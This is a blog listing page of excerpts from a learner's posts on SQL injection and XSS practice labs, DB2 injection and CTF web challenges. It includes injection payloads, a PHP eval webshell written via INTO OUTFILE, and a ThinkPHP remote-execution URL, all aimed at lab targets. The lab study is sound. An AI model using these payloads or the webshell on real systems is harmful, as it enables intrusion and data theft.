自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(25)
  • 收藏
  • 关注

原创 服务器常见路径

服务器常见路径说明在Windows系统中,常使用‘\’在Unix系统中,常使用’/’日志存储默认路径· apache + Linux : /etc/httpd/logs/accesslog 或 /var/log/httpd/accesslog· apache + win03 : D:\xampp\apache\logs\access.log 或 D:\xampp\apache\logs\error.log· IIS6.0 + win03 : C:\WINDOWS\system32\Logfil

2021-05-25 10:41:38 1247

原创 DB2数据库注入

db2数据库这里使用的靶场为墨者学院在线靶场确定字段数确定回显位id=-1 union select 1,2,3,4 from syscat.tables查看数据库基本信息/爆库爆表可以使用的表可以是syscat.tables,也可以是syscat.columns、sysibm.sysdummy1科普时间sysibm.sysdummy1 表是DB2数据库中的系统表,存放着系统的相关信息id=-1 union select 1,current schema,current s

2021-03-26 22:02:52 1209 1

原创 XSS-labs靶场

xss-labs靶场Less-01对于XSS漏洞,在实战中未避免因关键字被发现,多采用h5标签进行试探。可以判断存在xss注入;或者使用另一种payloadLess-02

2021-03-10 19:52:11 379 1

原创 Vulhub搭建

Ubuntu18.04搭建vulhub更新源为aliyun参考链接: link.这样可以加快后续的下载速度安装参考链接: link.如果发现apt命令报错,报错信息为:E: Could not get lock /var/lib/dpkg/lock-frontend - open (11: Resource temporarly unavailable),可以使用该命令即可解决sudo rm /var/lib/dpkg/lock-frontend sudo rm /var/l

2021-03-10 11:40:22 269

原创 sqli-labs靶场笔记(七)

sqli-labsLess-40【】

2021-01-03 16:58:27 127

原创 sqli-labs靶场笔记(六)

sqli-labs靶场笔记(六)Less-32【宽字节注入】下面展示一些 payload。id=1%df'and 1=1 %23 //判断注入类型id=1%df'order by 3 %23 //查看属性列个数id=-1%df'union select 1,user(),database() %23 //查看数据库用户、数据库名称iid=-1%df'union select 1,group_concat(0x7e,table_name),3 from information_schema.tab

2020-12-22 16:36:14 153 1

原创 sqli-labs靶场笔记(五)

sqli-labs靶场笔记(五)Less-17

2020-12-19 13:03:34 153

原创 sqli-labs靶场笔记(四)

sqli-labs靶场笔记(四)Less-11判断是否由前端屏蔽,采用更改数据包实现该网站使用POST请求方式,使用Live HTTP header进行注入操作判断username存在注入得到username对应的密码以上payload不仅可以在传输数据包时改包,还可以【以下】Less-12使用单引号直接爆错【没有回显】,尝试使用双引号【回显报错】和Less-11类似,还存在以下payloadLess-13开始先用单引号试水,报错回显该关卡无法使用改包进行Les

2020-12-11 17:01:26 109

原创 sqli-labs靶场笔记(三)

sqli-labs靶场笔记(三)Less-07【木马上传】下面展示一些 步骤。id=1')) order by 3--+ //显示属性为3列id=-1')) union select 1,2,'<?php @eval($_POST["code"]);?>' into outfile 'C:\\software\\phpstudy_pro\\WWW\\love.php'--+ //将一句话木马写入用蚁剑连接love.php即可通关Less-08【Boolean注入】下面展示一些

2020-12-08 11:38:05 134

原创 sqli-labs靶场笔记(二)

sqli-labs靶场笔记(二)Less-05【Boolean 注入】下面展示一些 步骤。id=1' order by 3 --+ //确定属性列id=1' and length(database())=8 --+ //确定数据库名长度为8id=1' and ascii(substr((select database()),1,1))=115 --+ //配合burp得到数据库名id=-1' or exists(select * from information_schema.columns)

2020-12-06 20:55:39 123

原创 sqli-labs靶场笔记(一)

sqli-labs靶场笔记(一)Less-01下面展示一些 会用到的payload。id=-1' union select 1,user(),database() --+id=-1' or exist(select * from information_schema_columns) --+id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='secur

2020-12-06 16:12:39 169

原创 靶场安装篇【sqli-labs】

靶场安装篇sql注入是日常比较常见的漏洞,sql注入也存在了很多方法进行注入,这里介绍的是sqli-labs基于docker的安装,sqli-labs靶场要求的环境都是较新的,为不和原有的环境相冲突,选择基于kali linux上安装的docker作为基础。安装docker在google上看了很多人的介绍,搞了一天,连起步的docker都没装上【这里使用的kali版本为2020】仅需要两句命令行sudo apt updatesudo apt install -y docker.io验证doc

2020-11-29 11:12:48 340

原创 Web攻防世界(十一)

CTF-WebWeb攻防世界WEB2题目开篇为一段代码,根据经验,多半为代码审计下面展示一些 php函数说明。strrev(); //反转函数,例如将HELLO变成OLLEHsubstr(); //截断函数,substr(字符串,起点,个数)ord(); //ASCII 编码,是chr函数的配对函数chr(); //从指定 ASCII 值返回字符str_rot13(); //对字符串执行 ROT13 编码,每一个字母在字母表中向前移动 13 个字母得到,数字和非字母字符保持不变ba

2020-11-26 20:38:12 162 1

原创 Web攻防世界(十)

CTF-WebWeb攻防世界前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第十天)NaNNaNNaNNaN-Batman本题下载附件,发现不存在文件后缀,用记事本打开,为乱码,根据eval()函数,判断其为js代码,使用 script | /scirpt 标签修改猴嘴名为html,用浏览器打开发现还是乱码…故在eval()函数前使用alert()函数将其输出下面展示一些 修改的点。<script>_='function $(){e

2020-11-13 16:32:42 149 1

原创 Web攻防世界(九)

CTF-WebWeb攻防世界前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第九天)PHP2题目显示为:题目不存在其他可上传的参数,xss、sql注入的可能性减少输入一般的首页名,后缀名为phps(查看源码)留意到注释存在注入参数id,当id=admin时,可以得到flag,但是不被允许访问。整合代码得到:<?phpif("admin"===$_GET[id]) { echo("<p> not allowed!&l

2020-11-11 17:54:26 117

原创 Web攻防世界(八)

CTF-WebWeb攻防世界unserialize3题目为一段代码,做了挺多题的,对于这种题,上来首先代码审计:创建了一个xctf类,一个参数为flag,重构方法_wakeup()。对于_wakeup(),其一般在序列化后被调用,所以构造一个.php文件下面展示一些 代码片。<?php class xctf{ public $flag = '111'; pubilc function __wakeup(){ exit('bad requests'); } } $a =

2020-11-10 22:11:35 132

原创 Web攻防世界(六)

CTF-WebWeb方向(攻防世界——找FLAG)前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第六天)前阵子一些事情耽搁了,补回来补回来!!!supersqlishow tables;show 判断注入点 单引号发现存在sql注入,报错信息得出:数据库类型为MariaDB判断属性个数使用order by语句属性列数为2存在过滤过滤了select、update、delete、drop、insert、where关键字接下来就要考虑绕

2020-11-09 16:56:38 142

原创 Web工具篇SQLMAP(一)

CTF-WebSQLMAP基本命令python sqlmap.py -hh //查看手册python sqlmap.py --version //查看版本判断是否存在注入点python sqlmap.py -u 'URL' //GET请求方式的检测(一个参数)python sqlmap.py -u "URL" //GET请求方式的检测(多个参数)...

2020-11-08 20:12:35 261

原创 Web攻防世界(五)

CTF-WebWeb方向(攻防世界——找FLAG)前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第六天)前阵子一些事情耽搁了,补回来补回来!!!Web_php_include题目显示出来就是整串代码通过对其代码的分析,发现该网页可获取两个参数:hello 和 page可以看出hello参数原数返回,故对page参数进行操作,另外该php代码还对php://协议进行过滤。所以这里可利用data://协议查看当前页面所在目录通过SERVER[‘D

2020-11-06 22:32:08 153

原创 Web攻防世界(七)

CTF-WebWeb方向(攻防世界——找FLAG)前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第五天)前阵子一些事情耽搁了,补回来补回来!!!Web_php_include题目显示出来就是整串代码通过对其代码的分析,发现该网页可获取两个参数:hello 和 page,另外该php代码还对php://协议进行过滤。所以这里可利用==data://==协议查看当前页面所在目录通过$_SERVER[‘DOCUMNET_ROOT’]获得当前目录为/v

2020-11-04 17:46:58 128

原创 SQL注入(数字型)

基本漏洞篇SQL注入(数字型)SQL注入就是在网站中注入sql语句,使其可以显示一些有用敏感信息本章描述的数字型即是注入点为数字,采用GET方式//sql_num.php<?php$conn = mysql_connect('localhost:3306','root','123456')or die('bad!');//$conn定义一个名字为conn的变量//使用账号root密码123456 去连接localhost这个mysql服务mysql_query("SET NAMES

2020-10-20 23:37:30 1886

原创 Web攻防世界(四)

CTF-WebWeb方向(攻防世界——找FLAG)前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第四天)php_rce通过链接查看题目之前看《web安全攻防》第一章有提及Thinkphp存在远程执行漏洞(Getshell)利用find函数http://220.249.52.133:39404/index.php?s=index/think\app/invokefunction&function=call_user_func_array&amp

2020-10-20 22:04:07 140 1

原创 Web攻防世界(三)

CTF-WebWeb方向(攻防世界——找FLAG)前期在bilibili学习Web知识、基本漏洞原理、burp的用法…(菜鸟第三天)baby_web通过连接访问得到HELLO WORLD字段根据一般思想,网页的首页一般名称为index、default、home同时,通过本题可以知晓后缀名确定为.phpTraining-WWW-Robots本题涉及robots协议,白给题呢xff_referer本题主要考察伪造X-Forwarded-For和Referer采用Burp伪造we

2020-10-18 15:43:11 164 1

原创 Web攻防世界(二)

CTF-WebWeb方向(攻防世界——找FLAG)前期在bilibili学习Web知识、基本漏洞原理、burp的用法…(菜鸟第二天)simple_php该题目为一段php代码采用的是GET请求方式,所以在URL后面添加/?a=’’&b=2345h,即可得到flagget_postHTTP协议常用的请求方式有两种:GET和POSTGET请求方式就是在查看源码后获得的变量直接在URL上赋值而POST请求方式则不可以这样在本题中考察两种方法的使用backup查找index.php

2020-10-16 20:57:03 219 1

原创 Web攻防世界(一)

部分见解来源网上各位,侵权删

2020-10-15 17:51:40 157

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除